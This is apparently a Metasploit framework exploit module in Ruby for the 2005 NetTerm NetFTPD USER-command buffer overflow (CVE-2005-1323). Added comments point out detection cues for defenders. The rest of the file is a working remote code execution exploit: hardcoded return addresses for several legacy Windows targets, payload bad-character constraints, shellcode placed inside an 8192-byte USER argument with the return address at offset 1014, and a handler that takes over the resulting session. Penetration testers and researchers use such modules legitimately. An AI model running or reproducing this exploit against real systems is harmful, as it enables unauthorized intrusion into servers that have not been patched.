rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/netterm_netftpd_user.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit remote exploit module for the NetTerm NetFTPD USER-command
# overflow (CVE-2005-1323, disclosed 2005-04-26).
#
# Points a reviewer or defender can read straight off this module:
# * The vulnerable path is reached with a plain `connect` followed by a USER
#   command, with no PASS and no login, so reachability of the FTP port is the
#   only precondition visible here.
# * The USER argument that gets sent is 8192 bytes long. A USER line of that
#   size is far outside normal FTP usage, which makes command-length limits in
#   network sensors or FTP proxies a practical detection point.
# * Every target depends on one fixed return address; presumably that only
#   holds on the legacy Windows builds listed under 'Targets'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Ftp

  # Registers the module metadata (references, payload constraints, targets)
  # with the framework.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'NetTerm NetFTPD USER Buffer Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the NetTerm NetFTPD
          application. This package is part of the NetTerm package.
          This module uses the USER command to trigger the overflow.
        },
        'Author' => ['hdm'],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2005-1323'],
          ['OSVDB', '15865'],
          ['URL', 'https://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'],
          ['BID', '13396'],
        ],
        'Privileged' => false,
        'Payload' => {
          'Space' => 1000,
          # NUL, LF, space and CR are excluded from the generated payload.
          'BadChars' => "\x00\x0a\x20\x0d",
          'StackAdjustment' => -3500,
        },
        'Platform' => ['win'],
        'Targets' => [
          # Tested OK - hdm 11/24/2005; address is in netftpd.exe (multiple versions)
          ['NetTerm NetFTPD Universal', { 'Ret' => 0x0040df98 }],
          # ws2help.dll
          ['Windows 2000 English', { 'Ret' => 0x75022ac4 }],
          # ws2help.dll
          ['Windows XP English SP0/SP1', { 'Ret' => 0x71aa32ad }],
          # peb magic :-)
          ['Windows 2003 English', { 'Ret' => 0x7ffc0638 }],
          # ws2help.dll
          ['Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }],
        ],
        'DisclosureDate' => '2005-04-26',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects are all recorded as unknown,
        # so the module says nothing about crash or residue behaviour.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Banner-only fingerprint: connects, disconnects, then matches the greeting.
  #
  # Detected means the greeting contains the product string, not that the
  # running build is vulnerable. Safe means only that the string was absent
  # (for example a customised banner). Neither result confirms patch state.
  def check
    connect
    disconnect
    return Exploit::CheckCode::Detected if banner =~ /NetTerm FTP server/

    Exploit::CheckCode::Safe
  end

  # Sends one oversized USER command followed by HELP, then hands control to
  # the payload handler.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # Original author's annotation of how the leading command bytes read as
    # x86 instructions:
    #   U        push ebp
    #   S        push ebx
    #   E        inc ebp
    #   R        push edx
    #   \x20\xC0 and al, al

    # 8192 bytes of filler that avoids the payload's bad characters.
    user_arg = rand_text_english(8192, payload_badchars)
    user_arg[0, 1] = "\xc0"

    # The encoded payload starts at offset 1.
    shellcode = payload.encoded
    user_arg[1, shellcode.length] = shellcode

    # The selected target's 'Ret' value, packed little-endian, sits at offset 1014.
    user_arg[1014, 4] = [target.ret].pack('V')

    send_cmd(["USER #{user_arg}"])
    # Follow-up command sent after the oversized USER line.
    send_cmd(['HELP'])

    handler
    disconnect
  end
end